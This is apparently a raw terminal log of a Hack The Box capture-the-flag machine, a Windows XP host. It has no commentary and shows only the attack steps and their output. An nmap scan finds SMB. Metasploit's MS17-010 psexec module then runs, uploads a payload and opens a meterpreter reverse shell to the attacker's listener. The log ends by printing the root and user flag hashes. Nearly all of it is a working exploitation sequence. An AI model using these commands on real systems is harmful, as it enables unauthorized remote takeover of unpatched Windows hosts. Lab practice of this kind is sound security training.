nmap -T4 -A -p- -Pn -v 10.10.10.4
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-24 14:29 UTC
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:29
Completed NSE at 14:29, 0.00s elapsed
Initiating NSE at 14:29
Completed NSE at 14:29, 0.00s elapsed
Initiating NSE at 14:29
Completed NSE at 14:29, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:29
Completed Parallel DNS resolution of 1 host. at 14:29, 0.00s elapsed
Initiating SYN Stealth Scan at 14:29
Scanning 10.10.10.4 [65535 ports]
Discovered open port 139/tcp on 10.10.10.4
Discovered open port 135/tcp on 10.10.10.4
Discovered open port 445/tcp on 10.10.10.4
Completed SYN Stealth Scan at 14:30, 42.10s elapsed (65535 total ports)
Initiating Service scan at 14:30
Scanning 3 services on 10.10.10.4
Completed Service scan at 14:30, 6.30s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.4
Retrying OS detection (try #2) against 10.10.10.4
Retrying OS detection (try #3) against 10.10.10.4
Retrying OS detection (try #4) against 10.10.10.4
Retrying OS detection (try #5) against 10.10.10.4
Initiating Traceroute at 14:30
Completed Traceroute at 14:30, 0.07s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 14:30
Completed Parallel DNS resolution of 2 hosts. at 14:30, 0.00s elapsed
NSE: Script scanning 10.10.10.4.
Initiating NSE at 14:30
Completed NSE at 14:30, 10.52s elapsed
Initiating NSE at 14:30
Completed NSE at 14:30, 0.01s elapsed
Initiating NSE at 14:30
Completed NSE at 14:30, 0.01s elapsed
Nmap scan report for 10.10.10.4
Host is up (0.072s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=5/24%OT=135%CT=1%CU=39320%PV=Y%DS=2%DC=T%G=Y%TM=628CEC
OS:10%P=x86_64-unknown-linux-gnu)SEQ(SP=103%GCD=1%ISR=108%TI=I%CI=I%II=I%SS
OS:=S%TS=0)OPS(O1=M508NW0NNT00NNS%O2=M508NW0NNT00NNS%O3=M508NW0NNT00%O4=M50
OS:8NW0NNT00NNS%O5=M508NW0NNT00NNS%O6=M508NNT00NNS)WIN(W1=FAF0%W2=FAF0%W3=F
OS:AF0%W4=FAF0%W5=FAF0%W6=FAF0)ECN(R=Y%DF=Y%T=80%W=FAF0%O=M508NW0NNS%CC=N%Q
OS:=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=80%W=0%S=Z%A=S%F=
OS:AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=FAF0%S=O%A=S+%F=AS%O=M508NW0NNT00NNS%RD
OS:=0%Q=)T4(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=80%W=0%S
OS:=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R
OS:=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=B0%UN=0%R
OS:IPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=S%T=80%CD=Z)

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h27m39s, deviation: 2h07m16s, median: 4d22h57m39s
|_smb2-time: Protocol negotiation failed (SMB2)
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:4a:c4 (VMware)
| Names:
|   LEGACY<00>           Flags: <unique><active>
|   HTB<00>              Flags: <group><active>
|   LEGACY<20>           Flags: <unique><active>
|   HTB<1e>              Flags: <group><active>
|   HTB<1d>              Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2022-05-29T19:28:10+03:00

root@ubuntu-s-1vcpu-1gb-sfo2-01:~/htb/htb/Pandora_10.10.11.136# msfconsole -q
/usr/lib/ruby/vendor_ruby/rubygems/defaults/operating_system.rb:10: warning: constant Gem::ConfigMap is deprecated
/usr/lib/ruby/vendor_ruby/rubygems/defaults/operating_system.rb:10: warning: constant Gem::ConfigMap is deprecated
/usr/lib/ruby/vendor_ruby/rubygems/defaults/operating_system.rb:29: warning: constant Gem::ConfigMap is deprecated
/usr/lib/ruby/vendor_ruby/rubygems/defaults/operating_system.rb:30: warning: constant Gem::ConfigMap is deprecated
/usr/lib/ruby/vendor_ruby/rubygems/defaults/operating_system.rb:10: warning: constant Gem::ConfigMap is deprecated
/usr/lib/ruby/vendor_ruby/rubygems/defaults/operating_system.rb:10: warning: constant Gem::ConfigMap is deprecated
Ignoring nokogiri-1.8.2 because its extensions are not built. Try: gem pristine nokogiri --version 1.8.2
/usr/lib/ruby/vendor_ruby/rubygems/defaults/operating_system.rb:10: warning: constant Gem::ConfigMap is deprecated
/usr/lib/ruby/vendor_ruby/rubygems/defaults/operating_system.rb:10: warning: constant Gem::ConfigMap is deprecated
[*] Starting persistent handler(s)...
msf6 > search MS17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

msf6 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > options

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                                  Required  Description
   ----                  ---------------                                  --------  -----------
   DBGTRACE              false                                            yes       Show extra debug trace info
   LEAKATTEMPTS          99                                               yes       How many times to try to leak transaction
   NAMEDPIPE                                                              no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /root/apps/metasploit-framework/data/wordlists/  yes       List of named pipes to check
                         named_pipes.txt
   RHOSTS                                                                 yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metas
                                                                                    ploit
   RPORT                 445                                              yes       The Target port (TCP)
   SERVICE_DESCRIPTION                                                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                   no        The service display name
   SERVICE_NAME                                                           no        The service name
   SHARE                 ADMIN$                                           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write f
                                                                                    older share
   SMBDomain             .                                                no        The Windows domain to use for authentication
   SMBPass                                                                no        The password for the specified username
   SMBUser                                                                no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     157.230.171.67   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/smb/ms17_010_psexec) > set rhosts 10.10.10.4
rhosts => 10.10.10.4
msf6 exploit(windows/smb/ms17_010_psexec) > set lhost 10.10.14.7
lhost => 10.10.14.7
msf6 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 10.10.14.7:4444
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 -    [*] Preparing dynamite...
[*] 10.10.10.4:445 -            [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 -    [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 -    [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x8638cc20
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... SxWIfsSY.exe
[*] 10.10.10.4:445 - Created \SxWIfsSY.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (175174 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \SxWIfsSY.exe...
[*] Meterpreter session 1 opened (10.10.14.7:4444 -> 10.10.10.4:1032 ) at 2022-05-24 14:46:21 +0000

meterpreter > shell
Process 1632 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.

C:\WINDOWS\system32>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.

C:\WINDOWS\system32>id
id
'id' is not recognized as an internal or external command,
operable program or batch file.

C:\WINDOWS\system32>cd \
cd \

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\

16/03/2017  08:30 ▒▒                 0 AUTOEXEC.BAT
16/03/2017  08:30 ▒▒                 0 CONFIG.SYS
16/03/2017  09:07 ▒▒    <DIR>          Documents and Settings
29/12/2017  11:41 ▒▒    <DIR>          Program Files
29/05/2022  07:43 ▒▒    <DIR>          WINDOWS
               2 File(s)              0 bytes
               3 Dir(s)   6.342.561.792 bytes free

C:\>cd "Documents and Settings"
cd "Documents and Settings"

C:\Documents and Settings>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings

16/03/2017  09:07 ▒▒    <DIR>          .
16/03/2017  09:07 ▒▒    <DIR>          ..
16/03/2017  09:07 ▒▒    <DIR>          Administrator
16/03/2017  08:29 ▒▒    <DIR>          All Users
16/03/2017  08:33 ▒▒    <DIR>          john
               0 File(s)              0 bytes
               5 Dir(s)   6.342.557.696 bytes free

C:\Documents and Settings>cd Administrator
cd Administrator

C:\Documents and Settings\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\Administrator

16/03/2017  09:07 ▒▒    <DIR>          .
16/03/2017  09:07 ▒▒    <DIR>          ..
16/03/2017  09:18 ▒▒    <DIR>          Desktop
16/03/2017  09:07 ▒▒    <DIR>          Favorites
16/03/2017  09:07 ▒▒    <DIR>          My Documents
16/03/2017  08:20 ▒▒    <DIR>          Start Menu
               0 File(s)              0 bytes
               6 Dir(s)   6.342.553.600 bytes free

C:\Documents and Settings\Administrator>cd Desktop
cd Desktop

C:\Documents and Settings\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\Administrator\Desktop

16/03/2017  09:18 ▒▒    <DIR>          .
16/03/2017  09:18 ▒▒    <DIR>          ..
16/03/2017  09:18 ▒▒                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   6.342.553.600 bytes free

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
993442d258b0e0ec917cae9e695d5713
C:\Documents and Settings\Administrator\Desktop>cd ..
cd ..

C:\Documents and Settings\Administrator>cd ..
cd ..

C:\Documents and Settings>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings

16/03/2017  09:07 ▒▒    <DIR>          .
16/03/2017  09:07 ▒▒    <DIR>          ..
16/03/2017  09:07 ▒▒    <DIR>          Administrator
16/03/2017  08:29 ▒▒    <DIR>          All Users
16/03/2017  08:33 ▒▒    <DIR>          john
               0 File(s)              0 bytes
               5 Dir(s)   6.342.549.504 bytes free

C:\Documents and Settings>cd john
cd john

C:\Documents and Settings\john>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\john

16/03/2017  08:33 ▒▒    <DIR>          .
16/03/2017  08:33 ▒▒    <DIR>          ..
16/03/2017  09:19 ▒▒    <DIR>          Desktop
16/03/2017  08:33 ▒▒    <DIR>          Favorites
16/03/2017  08:33 ▒▒    <DIR>          My Documents
16/03/2017  08:20 ▒▒    <DIR>          Start Menu
               0 File(s)              0 bytes
               6 Dir(s)   6.342.549.504 bytes free

C:\Documents and Settings\john>cd desktop
cd desktop

C:\Documents and Settings\john\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\john\Desktop

16/03/2017  09:19 ▒▒    <DIR>          .
16/03/2017  09:19 ▒▒    <DIR>          ..
16/03/2017  09:19 ▒▒                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)   6.342.549.504 bytes free

C:\Documents and Settings\john\Desktop>type user.txt
type user.txt
e69af0e4f443de7e36876fda4ec7644f

